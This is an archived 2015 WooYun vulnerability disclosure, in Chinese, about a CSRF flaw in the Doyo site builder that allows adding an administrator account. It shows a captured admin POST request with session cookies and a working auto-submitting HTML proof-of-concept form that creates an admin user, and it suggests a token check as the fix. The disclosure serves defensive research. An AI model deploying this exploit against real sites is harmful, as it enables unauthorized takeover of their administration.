乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-13: 细节已通知厂商并且等待厂商处理中 2015-03-18: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放 2015-05-12: 细节向核心白帽子及相关领域专家公开 2015-05-22: 细节向普通白帽子公开 2015-06-01: 细节向实习白帽子公开 2015-06-16: 细节向公众公开
Doyo建站最新版本存在CSRF添加管理员漏洞
在后台添加管理员打开burp抓下包看看是怎么样的带入数据库的
POST /doyo/admin.php?c=a_adminuser&a=add&run=1 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://127.0.0.1/doyo/admin.php?c=a_adminuser&a=addCookie: 33b5b_lastpos=other; 33b5b_ol_offset=98; 33b5b_ipstate=1425863599; 33b5b_cloudClientUid=9998101; 33b5b_jobpop=0; 33b5b_threadlog=%2C2%2C; editmode=0; 33b5b_readlog=%2C1%2C2%2C; 33b5b_bubble=a%3A1%3A%7Bs%3A17%3A%22pw_all_tip_tucool%22%3Bi%3A1%3B%7D; 33b5b_winduser=VT8BVwBcUlFTUgZQDl8FVQYNXwAABlRTXAZRAgdQWgwFUT4; 33b5b_ck_info=%2F%09; 33b5b_lastvisit=951%091425870595%09%2Fphpwind%2Fapps.php%3Fqweibo%26ajax1%26docomment%26nowtime1425870595548%26verify407e3b64ee9472c6; hd_sid=evILzk; AJSTAT_ok_times=1; tp_sid=6f35b5130ed53007; CNZZDATA1702264=cnzz_eid%3D544880126-1426140871-http%253A%252F%252F127.0.0.1%252F%26ntime%3D1426140871; PHPSESSID=eisqmk9g8iv1a4cqnv5oggm2h4; _currentUrl_=czo0OToiL3l1ZnVjbXMvYWRtaW4vaW5kZXgucGhwP209cGhvdG8mYT1pbmRleCZjYXRpZD00NCI7Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 64auid=&auser=test1&apass=123456&gid=1&level=1&aname=&amail=&atel=
建立的时候把是直接post数据到这里
auid=&auser=test1&apass=123456&gid=1&level=1&aname=&amail=&atel=
然后跳转:
http://127.0.0.1/doyo/admin.php?c=a_adminuser&a=add
那么在这个过程中木有啥的。我们来构造POC。
提供POC如下:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>OWASP CRSFTester Demonstration</title></head><body onload="javascript:fireForms()"><script language="JavaScript">var pauses = new Array( "125" );function pausecomp(millis){ var date = new Date(); var curDate = null; do { curDate = new Date(); } while(curDate-date < millis);}function fireForms(){ var count = 1; var i=0; for(i=0; i<count; i++) { document.forms[i].submit(); pausecomp(pauses[i]); }} </script><H2>OWASP CRSFTester Demonstration</H2><form method="POST" name="form0" action="http://127.0.0.1:80/doyo/admin.php?c=a_adminuser&a=add&run=1"><input type="hidden" name="auid" value=""/><input type="hidden" name="auser" value="test"/><input type="hidden" name="apass" value="123456"/><input type="hidden" name="gid" value="1"/><input type="hidden" name="level" value="1"/><input type="hidden" name="aname" value=""/><input type="hidden" name="amail" value=""/><input type="hidden" name="atel" value=""/></form></body></html>
加token限制
危害等级:无影响厂商忽略
忽略时间:2015-06-16 15:25
暂无